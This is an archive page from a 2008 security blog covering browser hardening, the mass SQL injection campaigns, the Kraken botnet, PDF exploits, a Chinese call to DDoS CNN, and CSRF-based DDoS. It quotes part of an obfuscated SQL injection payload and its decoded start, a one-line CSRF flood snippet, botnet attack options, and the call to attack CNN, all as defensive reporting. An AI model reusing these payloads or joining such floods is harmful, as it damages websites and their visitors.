4/1/08 - 5/1/08 | Security4all - Dedicated to digital security, enterprise 2.0 and presentation skills

at 30.4.08

Even if you recognize and ignore phishing emails, statistically, sooner or later you will visit an infected website. Previous research has shown that 0.45% of all websites are infected (your millage may vary). With all the recent drive-by infections, percentage might have increased. The internet is becoming a bad neighborhood. Email attachments aren't the biggest concern for viruses anymore. It's your browser now. So let's see how to protect ourselves.

Some of my old tips :

Using the browser as a non-administrator account or within a Sandbox (free tools such as AMUST Defender or Sandboxie)
Use a host-based firewall that blocks inbound and outbound connections per application.
Patch your system, not only the operating system and browser, but also plug-ins and non-browser applications. Several tools exist that make this assessment easier. One of these tools is the Secunia Software Inspector
Disabling JavaScript might be another very effective method to stop attacks. Most attacks we observed did need JavaScript to be enabled. Disabling JavaScript, however, might not be feasible as it would severely impact the functionality of many legitimate web sites. Some tools address this problem by globally disabling JavaScript, but selectively enabling it for certain trusted site. NoScript for the Firefox browser is an example of such a tool.
Use openDNS as it provides some anti-phishing protection
Don't be mainstream: The tests we conducted show that a simple but effective way to remove yourself as a targeted user is to use a non-mainstream application, such as Opera. As mentioned above, despite the existence of vulnerabilities, this browser didn’t seem to be a target.

Let add the tips from TSSCI security:

CERT has an excellent document on Securing your web browser! They cover IE, Firefox, and Safari — three secure references for the three most popular browsers.
However — as good CERT’s guide is, you won’t want to miss our past blog posts on safe/secure browsing, which are stacking up like hot-cakes:

8 Firefox extensions towards safer browsing
Firefox + httpOnly? While we’re at it
Client-side attacks: Protecting the most vulnerable
Protecting the systems - Day 12 ITSM Vulnerability Assessment techniques
Firefox 3 first impressions
Security and safe browsing for Firefox

Out of interest, I wanted to have another look at some browser statistics. Diversity is good and Firefox is still my favorite browser. Firefox made some good progress but has stagnated (or stabilized) for the last 6 months. Of course, Firefox 3 might tip the balance a little more. I have tested it and it's rendering is really fast. I haven't switched completely as since it's still a beta. Pick your favorite poison.

2008	IE7	IE6	IE5	Fx	Moz	S	O
March	21.9%	30.1%	1.1%	37.0%	1.1%	2.1%	1.4%
February	21.5%	30.7%	1.3%	36.5%	1.2%	2.0%	1.4%
January	21.2%	32.0%	1.5%	36.4%	1.3%	1.9%	1.4%

2007	IE7	IE6	IE5	Fx	Moz	S	O
December	21.0%	33.2%	1.7%	36.3%	1.4%	1.7%	1.4%
November	20.8%	33.6%	1.6%	36.3%	1.2%	1.8%	1.6%
October	20.7%	34.5%	1.5%	36.0%	1.3%	1.7%	1.6%
September	20.8%	34.9%	1.5%	35.4%	1.2%	1.6%	1.5%

at 30.4.08

Let take a trip back in time. In September, Germany accused China of cyberespionage. Now it seems that Germany was also using Trojans to eavesdrop on the communication of other countries. It's excuse? The war on terror!

Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.

The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.

The operation ended on November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a Parliament hearing two weeks ago.

German's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report. (Source: Securityfocus)

The article from The Spiegel mentioned some interesting parts

It all began in a small unit in the BND's Division 2. The department is responsible for "technical procurement" -- in other words, obtaining information with technical means, which mainly involves the wiretapping of telecommunications, called "signals intelligence" in industry jargon. In 2006, Division 2 consisted of 13 specialist departments and a management team (Department 20A), employing about 1,000 people. The departments are known by their German acronyms, like MOFA (mobile and operational telecommunications intelligence gathering), FAKT (cable telecommunications intelligence gathering) and OPUS (operational support and wiretapping technology).
In early June 2006, the OPUS team in department 26E launched an intelligence attack against Afghanistan. The details could have been taken from a Hollywood thriller, and the scope of the operation was far greater than has been revealed to date. According to the BND's secret allocation of responsibilities, OPUS is in charge of "technical and operational attacks on IT systems," a more or less accurate description of its agents' work.

So you see, not only China has a cyberintelligence division.

Related articles:

at 30.4.08

Episode 33 - Part 1 of 2 - Dave and Jim Discuss Defcon's upcoming 'Race to Zero' contest (Defcon 16), The McAfee S.P.A.M Experiment, and the 2008 RSA conference.

at 30.4.08

A new Bluebox has been released:

Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically.

Show Content:

00:20 - Intro to the show, contact information and how to provide comments. Welcome to all the new listeners - and to all those listeners who have been here for so long!
new comment line +1-415-830-5439
Special Edition #23 with Sonus Networks
Squawk Box podcast about voice phishing – also this article Vishing: The Latest, and Greatest, Security Concern
Cisco: Cisco Unified IP Phone Overflow and DoS Vulnerabilities and Dustin Trammell’s coverage
ZDNet: Design flaw in wireless VoIP handsets endanger the enterprise followed by Cisco confirms vulnerability in 7921 WiFi IP phone
Voice of VOIPSA: Slides about P2PSIP security new available
Voice of VOIPSA: RUCUS mailing list & BOF
Voice of VOIPSA: End-to-end VoIP security using DTLS-SRTP
Also a whole bunch on SIP Identity
SIP Torture Tests for IPv6 now out in RFC 5118
SIP Usage Scenarios Similar to SPIT
SPEERMINT Security BCPs
SIP Identity Baiting Attack
Concerns around Applicability of RFC 4474
VoIP Hopper 0.9.9 released (site ) – Thanks to Frank Leonhardt for the info.
VoIP News: Is Someone Listening to Your VoIP Calls? (linked to from ZDNet )
ZDNet: Cracking GSM
TMCnet- Practicing Safe OCS
TMCnet- Security Attack of the Day (Tom Cross starts blogging for TMCnet)
Speaking of Tom, Techtionary.com Releases SIP Security Checklist
Voice of VOIPSA: SIPTap Author forms VoIP Security Company (by Craig Bowser!)
Voice of VOIPSA: Underpowered Hardware
Project Spider – about SPIT
CBC: Bell recovers stolen data on 3.4 million customers

at 30.4.08

A short movie. When you don't control your data anymore. A scary future. Makes you think about putting all functions onto one card (payment, identity, car access, house access,...). It seems so convenient but ......

PS, the end is not suitable for young viewers.

..

at 29.4.08

Last week, the UN seemed to be amongst the websites falling victim to the SQL injection attack and it wasn't their first time. Reason? They never fixed the code and put a web application firewall in front of it:

One of my early Hackademix posts was about SQL injection vulnerabilities exploited to deface the United Nations main web site. In a later update I explained how, rather than fixing their holes properly, the U.N. technicians deployed a pretty useless Web Application Firewall, masking the most obvious attack surface but keeping their sites just as vulnerable as before.
...

The default search pattern of this tool is inurl:".asp" inurl:"a=": in English, “those web pages developed with Microsoft Active Server Pages technology and accepting query string parameters”. Unsurprisingly, this profile matches the original, still unpatched U.N. SQL injection; as I already said reporting the first accident, I believe crackers primarily target ASP sites (even though they are relatively few nowadays) because of the poor coding standards often shown by ASP coders, who usually have a Visual Basic desktop programming background and are less aware of web application security.
At any rate, some simple googling reveals that some U.N. sites are still infected, while UK Government sites have been “cleaned up”.
The sad truth, though, is that even those “clean” sites are still vulnerable, hence they could be reinfected at any time: some people just never learn… (Source: hackademix.net)

So this reminded me of the PCI 6.6 that was disclosed and gave some heated discussions about WAFs. I guess that it can buy you some time but a WAF is not a miracle worker. Fix the code !!!

Previous articles:

at 29.4.08

In the beginning of the month, there was a lot of discussion when a new botnet was discovered that claimed to be bigger and more dangerous then Storm Worm: The Kraken botnet. But soon afterwards, the discussion fell silent as all attention went back to Storm Worm in it's video codec spam wave. So, how is Kraken doing today? Quite well it seems. Here is some news from Threatexpert.com:

A new variant of Kraken/Bobax bot, firstly seen in the wild on 14th April 2008, seem to be gaining a bit of power: over the last week-end, our ThreatExpert system has received around 50 of unique samples of it, and we're still getting them at the same pace - 20-25 of new samples a day.

...

In some way, we may call this new feature of the bot as an "Artificial English Word Generator", that follows English grammar rules and produces words that look like most of other words. For example, compare "confusulent" or "pritation" with something like "ktjptrca".

What is it for? Probably, to evade SPAM filters, or any other algorithms that can distinguish a random word by locating weird or non-common combinations of characters. If no rule or algorithm can be built to distinguish such word, then it cannot be detected, and therefore, blocked.

The bot constructs an HTTP package with the encrypted contents that is MIME-encoded and is presented as a random MIME-type archive in the HTTP header.

Kraken/Bobax POSTs that HTTP package to its C&C servers (with the pseudo-random URLs), thus making it non-trivial to detect and block such traffic, as not much is left to "hook" in it.

...

As demostrated above, the new factor of "randomness" in this bot makes it extremely dangerous considering how serious is its effort in concealing its traffic in order to flow with no obstruction imposed by the firewalls.

The backdoor component is left intact in the new variant - its code was copy-and-pasted from the previous variant: the same commands, the same responses.

The SPAM engine and the email collector module are also identical to the previous variant.

Virustotal.com results are not very good considering only 9 out of 32 AV scanners (28.12%) can detect this threat, among which only two can actually identify this threat explicitly.

Read the full report.

Previous articles:

at 28.4.08

I know ITIL but I didn't hear about ISO 20000 before. So let's have a look at it and begin with the following:

Whitepaper: ITIL® V3 and ISO/IEC 20000 by Jenny Dugmore and Sharon Taylor

This outlines the differences between ITIL V3 and ISO/IEC 20000 from 'the perspective of each clause in the standard where the core 5 ITIL books either do not cover it or cover it differently. It does not cover changes that mean ITIL V3 is closer aligned to ISO/IEC 20000 than was ITIL V2. The table included within this white paper is an ISO/IEC 20000-1 centric document. It identifies clauses where there are notable differences between ISO/IEC 20000 and ITIL V3 that are not simply due to the different purposes of the two sets of documents.'

But isn't there any more information on ISO20000 itself? Well, let's go to ISO 20000 Central:

As described on other pages of this site, ISO 20000 is the international standard for IT Service management.

However, ISO 20000 itself is part of a much bigger picture, in that it aligns with ITIL, the IT Infrasture Library. This relationship is often illustrated via a diagram such as the one below:

Clearly, however, there is also a relationship with other management protocols and frameworks. This will be explored as additional features are added to this web portal.

Some ITILv3 resources and the relation to information security

at 28.4.08

There were some rumors that there wouldn't be a new Hack.lu. But luckily, the rumors weren't true. I happened to see this "small" announcement on their website last week.

Announcement: Yes there will be a hack.lu 2008. The date will be the 22-24 october in Luxembourg. Stay tuned we are about to assemble the bits and pieces. CfP will be send out 1st May. So prepare your submissions.

A three day conference in the center of Europe for bridging ethics and security in computer science.

Hack.lu is an open convention/conference where people can discuss about computer security, privacy, information technology and its cultural/technical implication on society. The aim of the convention is to: make a bridge of the various actors in the computer security world.

Marked in my calendar. Request to the manager underway.

Previous articles:

at 27.4.08

In the beginning of February, a critical security patch for Acrobat Reader was released. And now it's being actively used in targeted attacks. Here is an interesting analysis from SANS:

Ever since the end of March, beginning of April, the amount of samples seen in the wild has significantly increased. Interestingly enough, there is almost no "public, widespread" exploitation. All reports are limited to very specific, targeted attacks. However, due to the wide scope of these attacks, and the number of targets we know of, we feel a diary entry was in order. At this point in time, we are receiving more PDF samples from targeted attack victims per day than any other common file type (DOC, CHM, PPT). The threat agents, or attackers, are the same. They are just moving from other file types towards PDF, but are generally using the same control servers and similar backdoor families.

The files contain:
- an embedded trojan installer;
- a clean PDF file.

Once the file is opened in a vulnerable Acrobat Reader version, the backdoor will install, and the clean PDF file is opened in the user's browser. From a user experience, there are two possible methods of detection:

- If the file is opened in a patched Acrobat Reader, an error will be displayed that the file is corrupted;
- If the file is opened in a vulnerable Acrobat Reader, the user will see Acrobat Reader close and immediately reopen the valid PDF document.

Anti virus detection of these samples is usually very low heuristically. The below are detection results from a malicious PDF which had not been reported to an AV vendor yet. Note that these results vary per file.

The closing remarks were even more interesting, because it did contain a countermeasure, I wasn't aware of.

Acrobat Reader is proving to be an interesting target because users are not very much inclined to upgrade manually. The file format is relatively stable and users of Acrobat Reader 7 may not always feel a need to upgrade.

As such, we strongly recommend that you:

- Ensure your Acrobat Reader installations have been upgraded to version 8.1.2;
- Disable Javascript parsing through Edit>Preferences>Javascript, by disabling the 'Enable Acrobat JavaScript' option.

Read the full analysis @ SANS. Thank you Maarten.

Related articles:

at 27.4.08

I used to consider myself as a 'leftie'. A logical and analytical person with not much (need for) creativity. Most of the educational institutions have either exact sciences or creative curricula and the content is quite seperated.
You seldom see any courses about creativity or creative thinking when following exact sciences, which is a pity. Even if you are not a natural talent in either discipline, with some 'training' you could master the basics. They are not (or shouldn't) mutually exclusive. Even in IT or Engineering, some creativity can help you to think 'outside of the box' and come to solutions which you wouldn't be able to find using only logic. I consider creativity also an essential skill for good presentations. This was my epiphany of the last year.

You could also consider 'hacking' as a creative process, thinking about how to use technology in another way that everyone is using. So start using that other half of your brain !!!

My friend Karim started an interesting discussion about "The Beginner's mind".

Most of us have lost these abilities when gowning up. We’ve put the creative aspect away for only artists to use. Yet everyone should be the artist in it’s own line of work.
You may say that there is nothing creative about working in a regular business. But do you think that if there was no creativity within a business, that it could become innovative or differentiate itself within a given sector?

Within the zen teaching one often speaks of the “beginner’s mind” (or child’s mind). One who approaches life with a beginner’s mind is fresh, enthusiastic and open to a wide range of ideas. When one does not know what’s possible, one will be open to exploration/discovery. Unburdened by your fixed views/habits/…, one will see things more clearly.

Read his full post.

If you are interested in this topic, I can recommend the following book: A Whole New Mind: Why Right-Brainers Will Rule the Future.

The future belongs to a different kind of person with a different kind of mind: artists, inventors, storytellers-creative and holistic "right-brain" thinkers whose abilities mark the fault line between who gets ahead and who doesn't. Drawing on research from around the world, Pink outlines the six fundamentally human abilities that are absolute essentials for professional success and personal fulfillment-and reveals how to master them. A Whole New Mind takes readers to a daring new place, and a provocative and necessary new way of thinking about a future that's already here.

Updated with a part from Seth Godin: Really bad powerpoint Design:

Communication is the transfer of emotion.

Communication is about getting others to adopt your point of view, to help them understand why you’re excited (or sad, or optimistic or whatever else you are.)If all you want to do is create a file of facts and figures, then cancel the meeting and send in a report.

Our brains have two sides. The right side is emotional, musical and moody. The left side is focused on dexterity, facts and hard data. When you show up to give a presentation, people want to use both parts of their brain. So they use the right side to judge the way you talk, the way you dress and your body language. Often, people come to a conclusion about your presentation by the time you’re on the second slide. After that, it’s often too late for your bullet points to do you much good.

You can wreck a communication process with lousy logic or unsupported facts, but you can’t complete it without emotion. Logic is not enough.

Related articles:

at 25.4.08

Kudos to TheDarkVisitor for reporting this, even if it's not confirmed.

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issuses regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people. (TheDarkVisitor)

And the way they will do it will be very simply. By just asking people to surf to a website. Jeremiah was just referencing this kind of attack a few days ago and this is the real world example.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five,six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:

Yes. It loads an iframe: And then it reloads itself every five seconds:

(TheDarkVisitor)

I don't know what theyare hoping to accomplish as this attack can be easily avoided in the same way as before: Filtering or Blocking certain netblocks of China.

BUT if someone would throw in a botnet or two, that is another matter. And it seems, they have released the tools, just for the occasion: NetBot Attacker Anti-CNN Tool (Arbor Networks)

As I noted last night, another, third tool (that I know of) dedicated for Chinese who are upset and want to attack CNN has been released. The folks at Hackeroo have released a Netbot Attacker Anti-CNN version, free of charge, for folks to use. Normally Netbot Attacker is a commercial tool, but this is a focused version.

Netbot Attacker provides a simple Windows UI for controlling a botnet, reporting and managing the network, and commanding attacks. So far nothing special or new there. It ships as a simple RAR file with two pieces: an INI file (see below, partially edited and obscured) and a simple EXE.

...

A rough translation - provided with the bot - would be:
Common Attack: SYN Flood ICMP Flood UDP Flood UDP Small TCP Flood TCP Mult-Connect Web Attack : NoCache Get Flood CC Attack Http GET Nothing Speical Attack: CQ Game Attack Route Attack Smart Auto Attack Combine Attack: SYN+UDP Flood IACMP +TCP Flood UDP Small+TCP Connect
Note that there’s no mention to the average user that they’ll be able to access your PC now that you’re helping the cause.
It is unclear to me how much this specific tool is used compared to the others. In the end, the effect is the same, however, which is to try and drive an adversary offline with a packet flood.

Read the full analysis from Jose Nazario here including with screenshots.

The attack might go through in the next hours. Time to keep an eye on those Netcraft statistics. More news to follow.

By the way, apparently there was a third victim in this whole discussion. Slideshare.net also suffered a major DDoS peaking at 2.5 GBps last week.

UPDATE (25/04/2008): Or the attack has yet to really start, or CNN is taking the attack really well. Funny thing is when looking at the Netcraft statistics, that we only see some performance drops measured from Italy only. There were some spikes (response times) on that graph. During the last attack, we saw spikes on all of the graphics.

Previous articles:

at 25.4.08

It seems that the number of infected pages has mounted up to 510.000 pages (Source: F-Secure). Looking at the Belgian pages, it seems to have become 369 infected (injected) sites.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them. (Source: F-Secure)

Input validation people !!! Check out the OWASP Top Ten. SQL injection is back on spot nr. 2.

UPDATE (25/04/2008): SANS ISC is also giving some more details:

The crew over at shadowserver has published additional information related to SQL injected sites. They included the botnet controllers IP address 61.188.39.214 and a content based snort signature for the bot control traffic that is not ip dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

They have hit city websites, commercial sites and even government websites. This type of injection pretty much null and voids the concept of “trusted website”. or "safe sites".

The register covered it stating their search returned 173k injected results:
http://www.theregister.co.uk/2008/04/24/mass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more then one time.

Lou a self described “accidental techie” has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-exchange.com/Database/MySQL/Q_23337211.html

Previous articles:

at 25.4.08

Beware of opening Quicktime movies !!!

US-CERT is aware of a public report of a new vulnerability in Apple QuickTime. The report indicates that if a user opens a specially crafted QuickTime file, an attacker may be able to execute arbitrary code. This vulnerability may have several attack vectors, such as visiting a malicious or compromised website. US-CERT is currently investigating this report and will provide additional details as needed.

US-CERT encourages users to use caution when opening QuickTime files, and apply the best security practices described in the Securing Your Web Browser document, to help mitigate the risks. (Source: US CERT)

There is no patch as we speak so be careful. How many more of these security leaks will we see in quicktime?

UPDATE: The (original) GNUCITIZEN article with a movie on the exploit.

Related articles:

at 24.4.08

If you recently took a plane at the Schiphol airport (Amsterdam), it would have been possible that the data from your mobile phone, laptops, USB sticks or other media would have been copied and "searched". The reason: searching for distribution of childporn. (Source: security.nl)

It was only a pilot project because passengers are alleged to transport them physically out of fear for detection on the internet. Especially tourists that have been to Thailand, Brazil, Sri Lanka and Vietnam were under the loop.

The border police didn't tell what the search criteria were but they confirmed that laptops, digital cameras and cd-roms were inspected.

I already knew that they did these 'digital' searches at the US borders. It's seem to be spreading to other countries now. At least, they didn't use the terrorism wildcard.

I don't condone child porn at all but this practice has consequences. I have signed a NDA with my clients and I have a contractual and legal obligation to not disclose their information. I probably cannot refuse these kind of searches since that would also put me between a rock and a hard place.

The only alternative is that I can only travel with a cleanly installed laptop and use a (SSL) VPN to access my data. But with the prices of hotspots (in hotels), that's a pricey way of working.

This is so easy to circumvent. Just solder an USB flash chip to the PCB of your laptop and make it look a part of the laptop. It's of course not electronically connected and I doubt that they will disassemble the laptop and inspect it. Afterwards, remove and resolder the chip back onto the pendrive PCB. Maybe not the best example but these things are so small, that they seem easy to hide.

Does your IT staff has spare laptops ready for your travelers? Do you have a security policy that takes this into account? These kind of search practices has a major impact on the protection of our confidential information and the way our mobile users work.

at 24.4.08

ISSA-BE has received a request from Dr. Trimintzios from ENISA to support them in investigating security issues of OS virtualization technologies.

ENISA is planning to establish a Virtual Expert Group (no physical meetings required) to study the Security issues in Operating System Virtualisation Technologies. The work of the group is expected to result in a position paper which will be published by ENISA, while all the members selected for the group will be designated as co-authors.
The paper is aimed at end users of these technologies, policy and decision makers. I would like to ask you for your help in identifying experts for this new group.

Please inform anyone within or outside your organisation who has expertise on this topic and who would be interested in participating. Obviously if you feel you have the relevant expertise please propose yourself. The detailed Term of Reference for the Virtual Group and the ENISA position paper on security issues in OS virtualization technologies is available here.

For applications and further information please contact Dr. Simone BALBONI. Please note that we expect the paper to make a considerable impact in the press.

So if you have some expertise in this area, any help would be appreciated.

at 24.4.08

Jeremiah started a discussion about CSRF DDoS and why it could become a real threat.

It’s with this context in mind that I share my thoughts about DDoS attacks carried out by way of CSRF. Also, I take no credit for the novelty of this attack as its been rumored around in various circles for years. I’m merely drawing attention to the issue. Here’s the basic exploit code that a bad guy would need:

<* IMG SRC=”http://victim/” >

Simple enough? All the bad guy needs to do is post the HTML snippet to a large number of public websites where other users would come in contact with it. These websites could be message boards, guest books, WebMail, blog comments, social networks, chat rooms, and so on. All the types of websites quite popular, free to sign-up, and easy to automate (save for CAPTCHA). The code instructs a users browser to make an HTTP request to an arbitrary location (victim) invisibly and behind the scenes with connections originating from all over. This makes the attack difficult to stop and obviously the more frequented the websites are the more effective it is. (Source: Jeremiahgrossman)

Well, this might just be a theoretical attack or is it? I remembered Dancho Danchev posting the following piece (about the CNN attack):

What if a simple script that is automatically refreshing CNN.com multiple times in several IFRAME windows, gets embedded at thousands of sites, and then promoted at hundreds of forums, with a single line stating that - "If you're a patriot, forward this to all your friends"? Now, what if this gets coordinate to happen at a particular moment in time? This is perhaps the most realistic scenario to what exactly happened with CNN.com, and data speaks for itself, in fact I can easily state that the bandwidth generated by this massive PSYOPs campaign is greater than the one used by a botnet that's also been DDoS-ing CNN.com.

All of these sites are basically refreshing CNN.com every couple of seconds, thereby wasting the sites's bandwidth, the only flaw of this attack approach compared to a botnet, is that all the participating hosts are Chinese, and therefore as NetCraft pointed out, CNN blocked access to certain countries, take these countries as China for instance. (Source: ddanchev)

CSDDoS is just a term suggested in one of the comments of Jeremiah's post. Great, another IT acronym for the dictionary! ;-)

Reading the text above, the attack doesn't sound so theoretical anymore.

So, how long before blocking large netblocks like China won't work anymore?

Another interesting read is the Puppetnets (Misusing Web Browsers as a Distributed
Attack Infrastructure) paper from "Systems and Security Department, Institute for Infocomm Research, Singapore":

ABSTRACT

Most of the recent work on Web security focuses on preventing attacks that directly harm the browser’s host machine and user. In this paper we attempt to quantify the threat of browsers being indirectly misused for attacking third parties.
Specifically, we look at how the existing Web infrastructure (e.g., the languages, protocols, and security policies) can be exploited by malicious Web sites to remotely instruct browsers to orchestrate actions including denial of service attacks, worm propagation and reconnaissance scans. We show that, depending mostly on the popularity of a maliciousWeb site and user browsing patterns, attackers are able to create powerful botnet-like infrastructures that can cause significant damage. We explore the effectiveness of countermeasures including anomaly detection and more fine-grained browser security policies.

at 24.4.08

I haven't seen too many people post this yet but there are already some presentations online.
Get them here.

Now to wait impatiently for the videos and the rest of the presentations to come online.

Related posts:

at 23.4.08

Well, we don't even have to talk about Web 2.0 or social networks. A byproduct of the technology age we live in is information. We all have or leave an extensive information waste footprint without even realizing it. This can be (mis)used for identity theft or social engineering. It's has only been a few months since I mentioned maltego. The tool that has migrated from a webbased application to a downloadable GUI still leaves Google behind when it comes to personal information gathering.

Since the webbased application has been taken offline, I downloaded the GUI and played around with it. Of course, I used it on my own name and on my company and I can say only 'WOW'. Just try it, you'll be surprised of the information out there.

What is it?

Maltego is a program that can be used to determine the relationships and real world links between:
- People
- Groups of people (social networks)
- Companies
- Organizations
- Web sites
- Internet infrastructure such as:
- Phrases
- Affiliations
- Documents and files
These entities are linked using open source intelligence.
Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections.
Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away.
Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.

What can Maltego do for me?

Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.
Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
Maltego provide you with a much more powerful search, giving you smarter results.
If access to "hidden" information determines your success, Maltego can help you discover it

Look at the screenshots here.
Download here.
Download you API key here.

Your security policy and awareness program should take this into account. To get an idea of the issue and some suggested countermeasures, read ENISA's paper on "Security Issues and Recommendations for Online Social Networks. (Thanks to ISSA BE for mentioning this paper).

Introduction.

This paper aims to provide a useful introduction to security issues in the area of Social Networking, highlight the most important threats and make recommendations for action and best practices to reduce the security risks to users. Examples are given from a number of providers throughout the paper. These should be taken as examples only and there is no intention to single out a specific provider for criticism or praise. The examples provided are not necessarily those most representative or important, nor is the aim of this paper to conduct any kind of market survey, as there might be other providers which are not mentioned here and nonetheless are equally or more representative of the market.

Audience

This paper is aimed at corporate and political decision-makers as well as Social Network application-providers. It also seeks to raise awareness among political and corporate
decision-makers of the legal and social implications of new developments in Social Networking technologies. In particular, the findings should have important implications for education and data protection policy.

Some recommendations of the report are:

Recommendation SN.1 Encourage awareness-raising and educational campaigns
Recommendation SN.2 Review and reinterpret the regulatory framework
Recommendation SN.3 Increase transparency of data handling practices
Recommendation SN.4 Discourage the banning of SNSs in schools
Recommendation SN.5 Promote stronger authentication and access-control where appropriate
.....

Download full report here.

Update: Chris gates also refers to the following two presentations (thanks!!):

Presentations on Maltego:
CansecWest07 Presentation [PPT] (1.8MB)
FIRST 2007 Presentation [PPT] (4.5MB)

Related articles:

at 23.4.08

In the last weeks and months, several campaigns targeted a lot of websites to inject them with a malicious javascript. Mainly through SQL injections. High profile websites, like for example CNET.com, were also a victim to these attacks. It seems that they are at it again. A lot of websites got infected with "1.js" including UK government sites, and a United Nations website, "events.un.org". It was only last December when the UN website also got hacked through an SQL injection.

This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on http://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing.
There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here. Mentioned in that diary entry is http://www.2117[removed].net. Our blog on that attack can be found here. It appears that same tool was used to orchestrate this attack too.
When we first started tracking the use of this domain, the malicious JavaScript was still making use of http://www.nmida[removed].com/:
Now the attackers are referring to a file hosted on the new domain of http://www.nihao[removed].com:
Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search results below.
The number of sites affected is in the hundreds of thousands (Source: Websense)

Read full post here.

At the moment, Google shows some 177.000 websites infected. And please don't visit them with Javascript enabled. Use your Google Foo.

I was curious how many Belgian websites got infected. Ladies and gentlemen of the jury, it's 56!!!

My first instinct was to report this but my next thought was, to whom? I don't have time to track the webmasters down one by one. And Belgium doesn't have a CERT to contact. We do have the FCCU (Federal Computer Crime Unit) but that is partly a forensics team, not a nation wide CERT. *sigh*

I left them a message anyway. Let's hope it will do some good.

Sophos has some more information about the SQL injection technique used.

This morning, I was investigating another attack that is most likely related. The target of the malicious script tag has changed, but the underlying malicious SQL is very similar. The malicious injection can be seen below:
As you can see, the main guts of the malicious SQL (within @S) are obfuscated within the CAST(0x…) block (which is trimmed for clarity). Decryption is trivial, enabling us to identify how the attack works.
In brief, the SQL will concatenate a malicious script tag into all (n)text and (n)varchar fields of all user tables in the MS SQL database. Nasty. Particularly for webmasters who have been hit, leaving them with a cumbersome cleanup process, and the challenge of preventing the same attack hitting them again.
